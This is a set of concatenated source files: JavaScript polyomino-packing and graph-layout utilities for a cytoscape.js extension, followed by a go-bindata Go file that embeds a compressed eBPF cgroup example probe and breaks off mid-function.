* @param { Polyomino } polyomino
* @param { number } i
* @param { number } j
*/
placePolyomino(polyomino, i, j) {
polyomino.location.x = i;
polyomino.location.y = j;
for (let k = 0; k < polyomino.stepWidth; k++) {
for (let l = 0; l < polyomino.stepHeight; l++) {
if (polyomino.grid[k][l]) { //if [k] [l] cell is occupied in polyomino
this.grid[k - polyomino.center.x + i][l - polyomino.center.y + j].occupied = true;
}
}
}
//update number of occupired cells
this.numberOfOccupiredCells += polyomino.numberOfOccupiredCells;
this.updateBounds(polyomino);
// reset visited cells to none
for (let x = 0; x < this.stepWidth; x++) {
for (let y = 0; y < this.stepHeight; y++) {
this.grid[x][y].visited = false;
}
}
}
/**
* Updates step rectangle bounds so that the `polyomino` fits
* @param { Polyomino } polyomino
*/
updateBounds(polyomino) {
let polyRect = polyomino.getBoundingRectangle();
this.occupiedRectangle.x1 = Math.min(this.occupiedRectangle.x1, polyRect.x1);
this.occupiedRectangle.x2 = Math.max(this.occupiedRectangle.x2, polyRect.x2);
this.occupiedRectangle.y1 = Math.min(this.occupiedRectangle.y1, polyRect.y1);
this.occupiedRectangle.y2 = Math.max(this.occupiedRectangle.y2, polyRect.y2);
}
/**
* a function to determine if a polyomino can be placed on the given cell i,j
* @param { Polyomino } polyomino
* @param { number } i
* @param { number } j
*/
tryPlacingPolyomino(polyomino, i, j) {
for (var k = 0; k < polyomino.stepWidth; k++) {
for (var l = 0; l < polyomino.stepHeight; l++) {
//return false if polyomino goes outside the grid when placed on i,j
if (k - polyomino.center.x + i >= this.stepWidth || k - polyomino.center.x + i < 0 || l - polyomino.center.y + j >= this.stepHeight || l - polyomino.center.y + j < 0) {
return false;
}
//return false if the polymino cell and the corrosponding main grid cell are both occupied
if (polyomino.grid[k][l] && this.grid[k - polyomino.center.x + i][l - polyomino.center.y + j].occupied) {
return false;
}
}
}
return true;
}
/**
* calculates the value of the utility (aspect ratio) of placing a polyomino on cell i,j
* @param { Polyomino } polyomino
* @param { number } i
* @param { number } j
* @param { number } desiredAspectRatio
*/
calculateUtilityOfPlacing(polyomino, i, j, desiredAspectRatio) {
var result = {};
var actualAspectRatio = 1;
var fullness = 1;
var adjustedFullness = 1;
var x1 = this.occupiedRectangle.x1;
var x2 = this.occupiedRectangle.x2;
var y1 = this.occupiedRectangle.y1;
var y2 = this.occupiedRectangle.y2;
if (i - polyomino.center.x < x1) x1 = i - polyomino.center.x;
if (j - polyomino.center.y < y1) y1 = j - polyomino.center.y;
if (polyomino.stepWidth - 1 - polyomino.center.x + i > x2) x2 = polyomino.stepWidth - 1 - polyomino.center.x + i;
if (polyomino.stepHeight - 1 - polyomino.center.y + j > y2) y2 = polyomino.stepHeight - 1 - polyomino.center.y + j;
var width = x2 - x1 + 1;
var height = y2 - y1 + 1;
actualAspectRatio = width / height;
fullness = (this.numberOfOccupiredCells + polyomino.numberOfOccupiredCells) / (width * height);
if (actualAspectRatio > desiredAspectRatio) {
adjustedFullness = (this.numberOfOccupiredCells + polyomino.numberOfOccupiredCells) / (width * (width / desiredAspectRatio));
// height = width / desiredAspectRatio;
} else {
adjustedFullness = (this.numberOfOccupiredCells + polyomino.numberOfOccupiredCells) / ((height * desiredAspectRatio) * height);
// width = height * desiredAspectRatio;
}
result.actualAspectRatio = actualAspectRatio;
result.fullness = fullness;
result.adjustedFullness = adjustedFullness;
return result;
}
}
module.exports = {
Grid: Grid,
Polyomino: Polyomino,
BoundingRectangle: BoundingRectangle,
Point: Point
};
<|start_filename|>src/core/general-utils.js<|end_filename|>
var generalUtils = {};
var polyominoPacking = require('./polyomino-packing');
const { Point } = require('./polyomino-packing');
//a function to remove duplicate object in array
generalUtils.uniqueArray = function (ar) {
var j = {};
ar.forEach(function (v) {
j[v + '::' + typeof v] = v;
});
return Object.keys(j).map(function (v) {
return j[v];
});
};
//a function to determine the grid cells where a line between point p0 and p1 pass through
generalUtils.LineSuperCover = function (p0, p1) {
var dx = p1.x - p0.x, dy = p1.y - p0.y;
var nx = Math.floor(Math.abs(dx)), ny = Math.floor(Math.abs(dy));
var sign_x = dx > 0 ? 1 : -1, sign_y = dy > 0 ? 1 : -1;
var p = new polyominoPacking.Point(p0.x, p0.y);
var points = [new polyominoPacking.Point(p.x, p.y)];
for (var ix = 0, iy = 0; ix < nx || iy < ny;) {
if ((0.5 + ix) / nx == (0.5 + iy) / ny) {
// next step is diagonal
p.x += sign_x;
p.y += sign_y;
ix++;
iy++;
} else if ((0.5 + ix) / nx < (0.5 + iy) / ny) {
// next step is horizontal
p.x += sign_x;
ix++;
} else {
// next step is vertical
p.y += sign_y;
iy++;
}
points.push(new polyominoPacking.Point(p.x, p.y));
}
return points;
};
/**
* finds the current center of components
* @param { Array } components
*/
generalUtils.getCenter = function (components) {
// In case the platform doesn't have flatMap function
if (typeof Array.prototype['flatMap'] === 'undefined') {
Array.prototype['flatMap'] = function (f) {
const concat = (x, y) => x.concat(y);
const flatMap = (f, xs) => xs.map(f).reduce(concat, []);
return flatMap(f, this);
};
}
// @ts-ignore
let bounds = components.flatMap(component => component.nodes)
.map(node => ({
left: node.x,
top: node.y,
right: node.x + node.width - 1,
bottom: node.y + node.height - 1,
}))
.reduce((bounds, currNode) => ({
left: Math.min(currNode.left, bounds.left),
right: Math.max(currNode.right, bounds.right),
top: Math.min(currNode.top, bounds.top),
bottom: Math.max(currNode.bottom, bounds.bottom)
}), {
left: Number.MAX_VALUE,
right: -Number.MAX_VALUE,
top: Number.MAX_VALUE,
bottom: -Number.MAX_VALUE
});
return new Point((bounds.left + bounds.right) / 2, (bounds.top + bounds.bottom) / 2);
};
module.exports = generalUtils;
<|start_filename|>src/core/layout-utilities.js<|end_filename|>
var generalUtils = require('./general-utils.js');
var polyominoPacking = require('./polyomino-packing');
const { Point, Polyomino } = require('./polyomino-packing');
const { getCenter } = require('./general-utils.js');
const pose = require('../pose/pose.js');
var layoutUtilities = function (cy, options) {
const isFn = fn => typeof fn === 'function';
var instance = {};
instance.setOption = function (name, val) {
options[name] = val;
};
instance.placeHiddenNodes = function (mainEles) {
mainEles.forEach(function (mainEle) {
var hiddenEles = mainEle.neighborhood().nodes(":hidden");
hiddenEles.forEach(function (hiddenEle) {
var neighbors = hiddenEle.neighborhood().nodes(":visible");
if (neighbors.length > 1) {
instance.nodeWithMultipleNeighbors(hiddenEle);
} else instance.nodeWithOneNeighbor(mainEle, hiddenEle);
});
});
};
instance.placeNewNodes = function (eles) {
var components = this.findComponents(eles);
var disconnectedComp = [];
for (var i = 0; i < components.length; i++) {
var oneNeig = false;
var multNeig = false;
var mainEle;
var multneighbors = [];
var positioned = [];
var x = 0;
var y = 0;
var isPositioned = false;
for (var j = 0; j < components[i].length; j++) {
var neighbors = components[i][j].neighborhood().nodes().difference(eles);
positioned.push(false);
if (neighbors.length > 1 && !isPositioned) {
multNeig = true;
positioned[j] = true;
multneighbors = neighbors;
instance.nodeWithMultipleNeighbors(components[i][j], multneighbors);
x = components[i][j].position("x");
y = components[i][j].position("y");
isPositioned = true;
}
else if (neighbors.length == 1 && !isPositioned) {
oneNeig = true;
mainEle = neighbors[0];
positioned[j] = true;
instance.nodeWithOneNeighbor(mainEle, components[i][j], eles);
x = components[i][j].position("x");
y = components[i][j].position("y");
isPositioned = true;
}
}
if (oneNeig || multNeig) {
for (var j = 0; j < components[i].length; j++) {
if (positioned[j] == false) {
var neighbors = components[i][j].neighborhood().nodes();
var positionedNeigbors = [];
var curr = components[i][j].neighborhood().nodes().difference(eles);
curr.forEach(function (ele) {
positionedNeigbors.push(ele);
})
for (var k = 0; k < neighbors.length; k++) {
if (positioned[components[i].indexOf(neighbors[k])]) {
positionedNeigbors.push(neighbors[k]);
}
}
if (positionedNeigbors.length > 1) {
instance.nodeWithMultipleNeighbors(components[i][j], positionedNeigbors);
} else if (positionedNeigbors.length == 1) instance.nodeWithOneNeighbor(positionedNeigbors[0], components[i][j]);
else {
var horizontalP = instance.generateRandom(options.offset, options.offset * 2, 0);
var verticalP = instance.generateRandom(options.offset, options.offset * 2, 0);
components[i][j].position("x", x + horizontalP);
components[i][j].position("y", y + verticalP);
}
positioned[j] = true;
}
}
}
else {
disconnectedComp.push(components[i]);
}
}
if (disconnectedComp.length >= 1) {
instance.disconnectedNodes(disconnectedComp);
}
};
instance.disconnectedNodes = function (components) {
var leftX = Number.MAX_VALUE;
var rightX = -Number.MAX_VALUE;
var topY = Number.MAX_VALUE;
var bottomY = -Number.MAX_VALUE;
// Check the x and y limits of all hidden elements and store them in the variables above
cy.nodes(':visible').forEach(function (node) {
var halfWidth = node.outerWidth() / 2;
var halfHeight = node.outerHeight() / 2;
if (node.position("x") - halfWidth < leftX)
leftX = node.position("x") - halfWidth;
if (node.position("x") + halfWidth > rightX)
rightX = node.position("x") + halfWidth;
if (node.position("y") - halfHeight < topY)
topY = node.position("y") - halfHeight;
if (node.position("y") + halfHeight > bottomY)
bottomY = node.position("y") + halfHeight;
});
var radiusy = topY - bottomY;
var radiusx = rightX - leftX;
var innerRadius = (Math.sqrt(radiusx * radiusx + radiusy * radiusy)) / 2;
var centerX = (leftX + rightX) / 2;
var centerY = (topY + bottomY) / 2;
//var components = this.findComponents(newEles);
var numOfComponents = components.length;
var angle = 360 / numOfComponents;
var count = 1;
components.forEach(function (component) {
var distFromCenter = instance.generateRandom(innerRadius + options.offset * 6, innerRadius + options.offset * 8, 1);
var curAngle = angle * count;
var angleInRadians = curAngle * Math.PI / 180;
var x = centerX + distFromCenter * Math.cos(angleInRadians);
var y = centerY + distFromCenter * Math.sin(angleInRadians);
if (component.length == 1) {
component[0].position("x", x);
component[0].position("y", y);
}
else {
var positioned = [];
for (var i = 0; i < component.length; i++) {
positioned.push(false);
}
positioned[0] = true;
component[0].position("x", x);
component[0].position("y", y);
for (var i = 1; i < component.length; i++) {
var neighbors = component[i].neighborhood().nodes();
var positionedNeigbors = [];
for (var j = 0; j < neighbors.length; j++) {
if (positioned[component.indexOf(neighbors[j])]) {
positionedNeigbors.push(neighbors[j]);
}
}
if (positionedNeigbors.length > 1) {
instance.nodeWithMultipleNeighbors(component[i], positionedNeigbors);
} else if (positionedNeigbors.length == 1) instance.nodeWithOneNeighbor(positionedNeigbors[0], component[i]);
else {
var horizontalP = instance.generateRandom(options.offset, options.offset * 2, 0);
var verticalP = instance.generateRandom(options.offset, options.offset * 2, 0);
component[i].position("x", x + horizontalP);
component[i].position("y", y + verticalP);
}
positioned[i] = true;
}
}
count++;
});
};
instance.findComponents = function (newEles) {
var adjListArray = [];
var current = cy.nodes().difference(newEles);
newEles.forEach(function (ele) {
var neighbors = ele.neighborhood().nodes().difference(current);
var listOfIndexes = [];
neighbors.forEach(function (neigbor) {
var index = newEles.indexOf(neigbor);
listOfIndexes.push(index);
});
adjListArray.push(listOfIndexes);
});
// Mark all the vertices as not visited
var visited = [];
for (var v = 0; v < newEles.length; v++) {
visited.push(false);
}
var listOfComponents = [];
for (var v = 0; v < newEles.length; v++) {
var elesOfComponent = [];
if (visited[v] == false) {
// print all reachable vertices
// from v
this.DFSUtil(v, visited, adjListArray, newEles, elesOfComponent);
listOfComponents.push(elesOfComponent);
}
}
return listOfComponents;
};
instance.DFSUtil = function (v, visited, adjListArray, newEles, elesOfComponent) {
// Mark the current node as visited and print it
visited[v] = true;
elesOfComponent.push(newEles[v]);
// Recur for all the vertices
// adjacent to this vertex
for (var i = 0; i < adjListArray[v].length; i++) {
if (!visited[adjListArray[v][i]]) this.DFSUtil(adjListArray[v][i], visited, adjListArray, newEles, elesOfComponent);
}
};
instance.nodeWithOneNeighbor = function (mainEle, unplacedEle, allUnplacedEles) {
var quadrants = instance.checkOccupiedQuadrants(mainEle, unplacedEle, allUnplacedEles);
var freeQuadrants = [];
for (var property in quadrants) {
if (quadrants[property] === "free")
freeQuadrants.push(property);
}
//Can take values 1 and -1 and are used to place the hidden nodes in the random quadrant
var horizontalMult;
var verticalMult;
if (freeQuadrants.length > 0) {
if (freeQuadrants.length === 3) {
if (freeQuadrants.includes('first') && freeQuadrants.includes('second') && freeQuadrants.includes('third')) {
horizontalMult = -1;
verticalMult = -1;
}
else if (freeQuadrants.includes('first') && freeQuadrants.includes('second') && freeQuadrants.includes('fourth')) {
horizontalMult = 1;
verticalMult = -1;
}
else if (freeQuadrants.includes('first') && freeQuadrants.includes('third') && freeQuadrants.includes('fourth')) {
horizontalMult = 1;
verticalMult = 1;
}
else if (freeQuadrants.includes('second') && freeQuadrants.includes('third') && freeQuadrants.includes('fourth')) {
horizontalMult = -1;
verticalMult = 1;
}
}
else {
//Randomly picks one quadrant from the free quadrants
var randomQuadrant = freeQuadrants[Math.floor(Math.random() * freeQuadrants.length)];
if (randomQuadrant === "first") {
horizontalMult = 1;
verticalMult = -1;
}
else if (randomQuadrant === "second") {
horizontalMult = -1;
verticalMult = -1;
}
else if (randomQuadrant === "third") {
horizontalMult = -1;
verticalMult = 1;
}
else if (randomQuadrant === "fourth") {
horizontalMult = 1;
verticalMult = 1;
}
}
}
else {
horizontalMult = 0;
verticalMult = 0;
}
//Change the position of hidden elements
var horizontalParam = instance.generateRandom(options.idealEdgeLength - options.offset, options.idealEdgeLength + options.offset, horizontalMult);
var verticalParam = instance.generateRandom(options.idealEdgeLength - options.offset, options.idealEdgeLength + options.offset, verticalMult);
var newCenterX = mainEle.position("x") + horizontalParam;
var newCenterY = mainEle.position("y") + verticalParam;
unplacedEle.position("x", newCenterX);
unplacedEle.position("y", newCenterY);
};
instance.nodeWithMultipleNeighbors = function (ele, neighbors) {
if (neighbors == null) {
var neighbors = ele.neighborhood().nodes(":visible");
}
var x = 0;
var y = 0;
var count = 0;
neighbors.forEach(function (ele1) {
x += ele1.position("x");
y += ele1.position("y");
count++;
});
x = x / count;
y = y / count;
var diffx = instance.generateRandom(0, options.offset / 2, 0);
var diffy = instance.generateRandom(0, options.offset / 2, 0);
ele.position("x", x + diffx);
ele.position("y", y + diffy);
};
instance.generateRandom = function (min, max, mult) {
var val = [-1, 1];
if (mult === 0)
mult = val[Math.floor(Math.random() * val.length)];
return (Math.floor(Math.random() * (max - min + 1)) + min) * mult;
};
instance.checkOccupiedQuadrants = function (mainEle, unplacedEle, allUnplacedEles) {
var visibleEles = mainEle.neighborhood().difference(unplacedEle).difference(allUnplacedEles).nodes();
var occupiedQuadrants = { first: "free", second: "free", third: "free", fourth: "free" };
visibleEles.forEach(function (ele) {
if (ele.data('class') != 'compartment' && ele.data('class') != 'complex') {
if (ele.position("x") < mainEle.position("x") && ele.position("y") < mainEle.position("y"))
occupiedQuadrants.second = "occupied";
else if (ele.position("x") > mainEle.position("x") && ele.position("y") < mainEle.position("y"))
occupiedQuadrants.first = "occupied";
else if (ele.position("x") < mainEle.position("x") && ele.position("y") > mainEle.position("y"))
occupiedQuadrants.third = "occupied";
else if (ele.position("x") > mainEle.position("x") && ele.position("y") > mainEle.position("y"))
occupiedQuadrants.fourth = "occupied";
}
});
return occupiedQuadrants;
};
/**
* @param { { nodes: any[] }[] } components
* @param { { dx: number, dy: number }[] } shifts
*/
function calculatePackingCenter(components, shifts) {
components.forEach((component, index) => {
component.nodes.forEach(node => {
node.x += shifts[index].dx;
node.y += shifts[index].dy;
});
});
return getCenter(components);
}
/**
* @param { any[] } components
*/
instance.packComponents = function (components, randomize = true) {
var spacingAmount = options.componentSpacing;
if(spacingAmount !== undefined) { // is spacingAmount is undefined, we expect it to be an incremental packing
if (randomize) {
spacingAmount = spacingAmount - 52; // subtract 52 to make it compatible with the incremental packing
}
spacingAmount = Math.max(1, spacingAmount); // incremental packing requires spacingAmount > 0
}
let currentCenter = generalUtils.getCenter(components);
var packingResult;
let mainGrid; // used in randomized packing
if (!randomize) {
packingResult = pose.packComponents(components, {
componentSpacing: spacingAmount
});
}
else {
var gridStep = 0;
var totalNodes = 0;
components.forEach(function (component) {
totalNodes += component.nodes.length;
component.nodes.forEach(function (node) {
gridStep += node.width + node.height;
});
});
gridStep = gridStep / (2 * totalNodes);
gridStep = Math.floor(gridStep * options.polyominoGridSizeFactor);
components.forEach(function (component) {
component.nodes.forEach(function (node) {
node.x = node.x - spacingAmount;
node.y = node.y - spacingAmount;
node.width = node.width + (2 * spacingAmount);
node.height = node.height + (2 * spacingAmount);
});
});
var gridWidth = 0, gridHeight = 0;
/** @type { Polyomino[] } */
var polyominos = [];
var globalX1 = Number.MAX_VALUE, globalX2 = -Number.MAX_VALUE, globalY1 = Number.MAX_VALUE, globalY2 = -Number.MAX_VALUE;
//create polyominos for components
components.forEach(function (component, index) {
var x1 = Number.MAX_VALUE, x2 = -Number.MAX_VALUE, y1 = Number.MAX_VALUE, y2 = -Number.MAX_VALUE;
component.nodes.forEach(function (node) {
if (node.x <= x1) x1 = node.x;
if (node.y <= y1) y1 = node.y;
if (node.x + node.width >= x2) x2 = node.x + node.width;
if (node.y + node.height >= y2) y2 = node.y + node.height;
});
component.edges.forEach(function (edge) {
if (edge.startX <= x1) x1 = edge.startX;
if (edge.startY <= y1) y1 = edge.startY;
if (edge.endX >= x2) x2 = edge.endX;
if (edge.endY >= y2) y2 = edge.endY;
});
if (x1 < globalX1) globalX1 = x1;
if (x2 > globalX2) globalX2 = x2;
if (y1 < globalY1) globalY1 = y1;
if (y2 > globalY2) globalY2 = y2;
let componentWidth = x2 - x1;
let componentHeight = y2 - y1;
gridWidth += componentWidth;
gridHeight += componentHeight;
var componentPolyomino = new polyominoPacking.Polyomino(x1, y1, componentWidth, componentHeight, gridStep, index);
//fill nodes to polyomino cells
component.nodes.forEach(function (node) {
//top left cell of a node
var topLeftX = Math.floor((node.x - x1) / gridStep);
var topLeftY = Math.floor((node.y - y1) / gridStep);
//bottom right cell of a node
var bottomRightX = Math.floor((node.x + node.width - x1) / gridStep);
var bottomRightY = Math.floor((node.y + node.height - y1) / gridStep);
//all cells between topleft cell and bottom right cell should be occupied
for (var i = topLeftX; i <= bottomRightX; i++) {
for (var j = topLeftY; j <= bottomRightY; j++) {
componentPolyomino.grid[i][j] = true;
}
}
});
//fill cells where edges pass
component.edges.forEach(function (edge) {
var p0 = {}, p1 = {};
p0.x = (edge.startX - x1) / gridStep;
p0.y = (edge.startY - y1) / gridStep;
p1.x = (edge.endX - x1) / gridStep;
p1.y = (edge.endY - y1) / gridStep;
//for every edge calculate the super cover
var points = generalUtils.LineSuperCover(p0, p1);
points.forEach(function (point) {
var indexX = Math.floor(point.x);
var indexY = Math.floor(point.y);
if (indexX >= 0 && indexX < componentPolyomino.stepWidth && indexY >= 0 && indexY < componentPolyomino.stepHeight) {
componentPolyomino.grid[Math.floor(point.x)][Math.floor(point.y)] = true;
}
});
});
//update number of occupied cells in polyomino
for (var i = 0; i < componentPolyomino.stepWidth; i++) {
for (var j = 0; j < componentPolyomino.stepHeight; j++) {
if (componentPolyomino.grid[i][j]) componentPolyomino.numberOfOccupiredCells++;
}
}
polyominos.push(componentPolyomino);
});
//order plyominos non-increasing order
polyominos.sort(function (a, b) {
var aSize = a.stepWidth * a.stepHeight;
var bSize = b.stepWidth * b.stepHeight;
// a should come before b in the sorted order
if (aSize > bSize) {
return -1;
// a should come after b in the sorted order
} else if (aSize < bSize) {
return 1;
// a and b are the same
} else {
return 0;
}
});
//main grid width and height is two the times the sum of all components widths and heights (worst case scenario)
//intialize the grid add 1 to avoid insufficient grid space due to divisin by 2 in calcuations
mainGrid = new polyominoPacking.Grid((gridWidth * 2) + gridStep, (gridHeight * 2) + gridStep, gridStep);
//place first (biggest) polyomino in the center
mainGrid.placePolyomino(polyominos[0], mainGrid.center.x, mainGrid.center.y);
//for every polyomino try placeing it in first neighbors and calculate utility if none then second neighbor and so on..
for (var i = 1; i < polyominos.length; i++) {
var fullnessMax = 0;
var adjustedFullnessMax = 0;
var weigthFullnessAspectRatio = 0;
var minAspectRatioDiff = 1000000;
var placementFound = false;
var cells = [];
var resultLocation = {};
while (!placementFound) {
cells = mainGrid.getDirectNeighbors(cells, Math.ceil(Math.max(polyominos[i].stepWidth, polyominos[i].stepHeight) / 2));
cells.forEach(function (cell) {
if (mainGrid.tryPlacingPolyomino(polyominos[i], cell.x, cell.y)) {
placementFound = true;
var utilityValue = mainGrid.calculateUtilityOfPlacing(polyominos[i], cell.x, cell.y, options.desiredAspectRatio);
var cellChosen = false;
if (options.utilityFunction == 1) {
if (utilityValue.adjustedFullness > adjustedFullnessMax) {
cellChosen = true;
} else if (utilityValue.adjustedFullness == adjustedFullnessMax) {
if (utilityValue.fullness > fullnessMax) {
cellChosen = true;
} else if (utilityValue.fullness == fullnessMax) {
if (Math.abs(utilityValue.actualAspectRatio - options.desiredAspectRatio) <= minAspectRatioDiff) {
cellChosen = true;
}
}
}
if (cellChosen) {
adjustedFullnessMax = utilityValue.adjustedFullness;
minAspectRatioDiff = Math.abs(utilityValue.actualAspectRatio - options.desiredAspectRatio);
fullnessMax = utilityValue.fullness;
resultLocation.x = cell.x;
resultLocation.y = cell.y;
}
} else if (options.utilityFunction == 2) {
var aspectRatioDiff = Math.abs(utilityValue.actualAspectRatio - options.desiredAspectRatio);
var weightedUtility = (utilityValue.fullness * .5) + ((1 - aspectRatioDiff / Math.max(utilityValue.actualAspectRatio, options.desiredAspectRatio) * .5));
if (weightedUtility > weigthFullnessAspectRatio) {
weigthFullnessAspectRatio = weightedUtility;
resultLocation.x = cell.x;
resultLocation.y = cell.y;
}
}
}
});
}
mainGrid.placePolyomino(polyominos[i], resultLocation.x, resultLocation.y);
}
//sort polyominos according to index of input to return correct output order
polyominos.sort(function (a, b) {
if (a.index < b.index) {
return -1;
} else if (a.index > b.index) {
return 1;
} else {
return 0;
}
});
packingResult = {
shifts: []
};
/* var shiftX = componentsCenter.x - ((mainGrid.center.x - mainGrid.occupiedRectangle.x1)*gridStep);
var shiftY = componentsCenter.y - ((mainGrid.center.y - mainGrid.occupiedRectangle.y1)*gridStep);
var occupiedCenterX = Math.floor((mainGrid.occupiedRectangle.x1 + mainGrid.occupiedRectangle.x2)/2);
var occupiedCenterY = Math.floor((mainGrid.occupiedRectangle.y1 + mainGrid.occupiedRectangle.y2)/2); */
polyominos.forEach(function (pol) {
var dx = (pol.location.x - pol.center.x - mainGrid.occupiedRectangle.x1) * gridStep - pol.x1;//+shiftX;
var dy = (pol.location.y - pol.center.y - mainGrid.occupiedRectangle.y1) * gridStep - pol.y1;// + shiftY;
//var dx = (pol.location.x -occupiedCenterX) * gridStep + componentsCenter.x- pol.leftMostCoord;//+shiftX;
//var dy = (pol.location.y -occupiedCenterY) * gridStep + componentsCenter.y-pol.topMostCoord;// + shiftY;
packingResult.shifts.push({ dx: dx, dy: dy });
});
}
// Calculate what would be the center of the packed layout
let packingCenter = calculatePackingCenter(components, packingResult.shifts);
// Calculate the neccessary additional shift to re-center
let centerShift = packingCenter.diff(currentCenter);
// Add the center shift
for (let shift of packingResult.shifts) {
shift.dx += centerShift.x;
shift.dy += centerShift.y;
}
if (randomize) {
packingResult.aspectRatio = Math.round(((mainGrid.occupiedRectangle.x2 - mainGrid.occupiedRectangle.x1 + 1) / (mainGrid.occupiedRectangle.y2 - mainGrid.occupiedRectangle.y1 + 1)) * 1e2) / 1e2;
packingResult.fullness = Math.round(((mainGrid.numberOfOccupiredCells / ((mainGrid.occupiedRectangle.x2 - mainGrid.occupiedRectangle.x1 + 1) * (mainGrid.occupiedRectangle.y2 - mainGrid.occupiedRectangle.y1 + 1))) * 100) * 1e2) / 1e2;
if (packingResult.aspectRatio > options.desiredAspectRatio) {
var mainGridWidth = mainGrid.occupiedRectangle.x2 - mainGrid.occupiedRectangle.x1 + 1;
packingResult.adjustedFullness = Math.round((((mainGrid.numberOfOccupiredCells) / (mainGridWidth * (mainGridWidth / options.desiredAspectRatio)) * 100)) * 1e2) / 1e2;
// height = width / desiredAspectRatio;
} else {
var mainGridheight = mainGrid.occupiedRectangle.y2 - mainGrid.occupiedRectangle.y1 + 1;
packingResult.adjustedFullness = Math.round((((mainGrid.numberOfOccupiredCells) / ((mainGridheight * options.desiredAspectRatio) * mainGridheight)) * 100) * 1e2) / 1e2;
// width = height * desiredAspectRatio;
}
}
return packingResult;
};
return instance;
};
module.exports = layoutUtilities;
| ahmethalac/cytoscape.js-layout-utilities |
<|start_filename|>manager/examples/programs/cgroup/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\xbf\x6f\x13\x31\x14\xfe\x9c\x84\x34\xb4\x1d\x0a\x03\x2a\xa7\x0e" +
"\x27\x90\xba\x80\x4c\x8b\x10\x82\xad\x8a\x44\x58\x3a\x20\x54\x36\xa4\xe3\x7a\x71\x4b\x94\xe4\x12\x7c\x17\x7e\x05" +
"\x09\x31\xb0\x77\x61\x46\xfc\x07\x6c\x65\xe3\x5f\xe8\xc8\xc8\x88\xc4\x52\x24\x24\x36\x5c\x3d\xc7\x4e\x2c\xe7\x4e" +
"\xe9\x93\x1c\xbf\xf7\xd9\xef\xbd\xef\x7d\x72\xee\xfd\x83\xdd\x56\x85\x31\x58\x63\xf8\x87\x59\x34\xb3\x6f\x95\x99" +
"\xbf\x63\x7e\x57\xc1\x70\xcc\x80\x65\x00\xdd\xe0\xaf\x22\x94\x62\x29\xb2\x2c\x09\x4e\x75\xbc\xce\x80\x43\x39\x18" +
"\x91\x3f\x0c\xc5\xe1\x38\xf8\x35\xc5\xa5\x68\x87\xe4\x0f\xd2\x30\x19\x07\x3f\xa7\xb8\xc8\xc3\x84\xfc\x78\x98\x8f" +
"\xc6\xc1\x8f\x29\x9e\x8a\x57\xfa\xfe\x30\x4e\xba\xe3\xe0\x44\xe3\xdf\xbf\x4c\x38\x2d\x31\xe0\x44\x29\x75\x5c\x01" +
"\x36\x01\x7c\x04\x50\x27\x3e\x7a\x26\xe0\x93\xe1\x4e\x35\x28\x9f\x7a\x50\x7d\xe2\x40\xfd\x89\x23\xf1\x23\xee\xcb" +
"\x78\xf8\x68\x17\xc0\x7f\xa5\xd4\xe7\xdf\x0c\xeb\x9e\x16\x5a\x1f\xf7\xa0\xe6\xac\x06\x80\xb5\xd9\x5d\xeb\xb2\xb7" +
"\x8f\xd1\x78\xb7\xc2\x56\x69\x16\xb3\xac\x7d\x2d\xd0\xdb\xb7\x27\xba\xfc\x1f\x55\x74\x56\x45\x75\x0e\xbb\x01\xe0" +
"\x12\x2e\x4c\xe3\x9a\xd9\xaf\x69\xbc\x3e\x87\x37\x01\x5c\x76\xea\x58\x4e\x1b\xce\xcc\xfa\x09\xf0\x5c\xbc\xce\xc1" +
"\x9b\x7b\x2d\x4e\xce\x44\xb8\x28\xeb\xee\xdf\x9a\x88\x87\xe8\xa5\x90\x59\x67\x90\x22\xea\x75\x12\x91\x66\x02\x5c" +
"\x8a\x1e\x17\xcf\xa3\x03\x19\xf7\x85\xcd\x98\xdc\x8e\x0e\x46\x69\x82\x7e\xdc\x49\x79\x02\x9e\xe5\x32\x8f\xf7\xc1" +
"\xb3\x37\x7d\xbd\x37\xf7\x5a\xe0\x72\xd0\x8e\xf3\x98\xce\xb6\xf9\xf6\xdd\x73\x48\x75\x2e\x7b\xaa\x75\x9b\xb7\x2d" +
"\xf3\xce\x3f\x78\xb8\xff\x9f\x60\x66\xd5\x3d\x7c\xa7\xa4\x5f\xcd\x8b\xd7\x16\xe4\xfb\x6f\xa2\xe1\xc5\x2f\x4c\xfe" +
"\x6d\x0f\x3f\x35\xfb\x66\x41\x3f\x77\x8e\x9b\xc6\xf7\x35\xb8\xc2\x8a\xf9\xfa\xf3\x5f\x2f\xc9\xdf\x28\xc9\xf7\xe3" +
"\x5e\x41\x4d\xb2\xd0\x80\x57\x17\xf4\x5f\x2a\xc9\xbf\x6f\xc0\x70\x41\xfe\x3d\xf7\x4d\x3b\xf6\xcc\x5c\xdc\xf2\x70" +
"\x5f\xff\x3b\x00\x2e\x16\xf1\x37\x05\xad\xde\x2b\xe6\x9e\xcd\xb7\x78\xbb\xa0\x37\xd9\x91\xe9\x7f\xe4\xf0\xae\x3a" +
"\xf9\xf6\xbb\x71\x16\x00\x00\xff\xff\x40\x5f\x6c\xa0\xb8\x05\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1464,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295090, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
